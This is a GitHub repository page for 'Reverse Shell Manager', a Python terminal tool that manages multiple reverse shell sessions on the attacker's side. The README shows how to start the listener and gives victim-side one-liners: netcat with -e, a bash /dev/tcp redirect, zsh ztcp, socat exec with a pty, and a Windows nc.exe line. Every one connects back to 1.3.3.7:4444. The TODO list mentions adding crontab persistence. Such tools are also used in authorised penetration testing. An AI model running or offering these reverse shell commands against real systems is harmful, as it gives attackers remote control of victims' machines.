Skip to content

5up3rc/Reverse-Shell-Manager-1

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

76 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Reverse Shell Manager

A multiple reverse shell sessions/clients manager via terminal

New version is under development

  • Platypus
    • More stable
    • More features
    • Upgrade common reverse shell session to full interactive seession
    • ...

Attacker side

python Reverse-Shell-Manager.py 0.0.0.0 4444

Victims sides

Linux

nc -e /bin/bash 1.3.3.7 4444
bash -c 'bash -i >/dev/tcp/1.3.3.7/4444 0>&1'
zsh -c 'zmodload zsh/net/tcp && ztcp 1.3.3.7 4444 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:1.3.3.7:4444  

Windows

nc.exe -e /bin/bash 1.3.3.7 4444

Simple Example Video

asciicast

YouTube Example

https://youtu.be/AoS-q1MGw30

TODO

  • 实现添加 crontab 的功能
  • 实现删除 crontab 的功能
  • 使用异步 HTTP 库 grequests
  • Master 面向对象
  • 抛弃多线程 , 使用 select/epoll 来解决并发问题

Bugs

  • 主机上线但是并没有被加入列表
  • socket 在 recv 的时候会出现假死的情况 (暂时不能复现)

LICENSE

THE DRINKWARE LICENSE

<wangyihanger@gmail.com> wrote this file. As long as 
you retain this notice you can do whatever you want 
with this stuff. If we meet some day, and you think 
this stuff is worth it, you can buy me the following
drink(s) in return.

Red Bull
JDB
Coffee
Sprite
Cola
Harbin Beer
etc

Wang Yihang

About

🔨 A multiple reverse shell session/client manager via terminal

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%